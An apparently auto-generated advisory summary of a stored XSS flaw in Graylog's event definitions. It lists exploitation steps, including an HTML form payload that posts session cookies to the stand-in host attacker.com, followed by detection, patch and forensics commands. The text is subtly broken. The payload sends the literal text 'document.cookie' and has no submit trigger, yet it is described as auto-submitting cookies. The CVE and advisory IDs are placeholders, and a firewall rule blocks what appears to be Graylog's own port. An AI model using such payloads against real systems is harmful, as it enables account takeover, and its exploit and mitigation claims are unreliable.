How the CVE Works
The vulnerability (CVE-2025-XXXX) in Graylog allows session hijacking due to insufficient HTML sanitization in the Event Definition Remediation Step field. An attacker with permissions to create event definitions can inject malicious HTML forms that capture user session cookies when viewed by another user with alert permissions. The attack requires an active input (e.g., HTTP, TCP raw, or syslog) to receive the stolen data. Since Graylog does not properly sanitize user-supplied HTML, the injected payload executes in the victim’s browser, exfiltrating session tokens and enabling account takeover.
DailyCVE Form
Platform: Graylog
Version: <=6.0.13, 6.1.0-6.1.9
Vulnerability: Stored XSS
Severity: High
Date: May 7, 2025
What Undercode Say:
Exploitation:
1. Craft Malicious Payload:
<form action="http://attacker.com/steal" method="POST"> <input type="hidden" name="cookie" value="document.cookie"> </form>
2. Inject via Event Definition:
Submit the payload in the Remediation Step field of a new Event Definition.
3. Trigger Execution:
When a victim views the alert, the form auto-submits their session cookie.
Detection:
grep -r "unsafeHTML" /graylog/web/ Locate vulnerable sanitization logic
Mitigation:
- Patch Immediately: Upgrade to Graylog 6.0.14 or 6.1.10.
2. Input Validation:
function sanitizeHTML(input) {
return DOMPurify.sanitize(input); // Use strict sanitization
}
3. Network Controls:
iptables -A INPUT -p tcp --dport 9000 -j DROP Block external inputs
Forensics:
cat /var/log/graylog/server.log | grep "EventDefinition" Audit suspicious creations
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- CVE Details: CVE-2025-XXXX
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
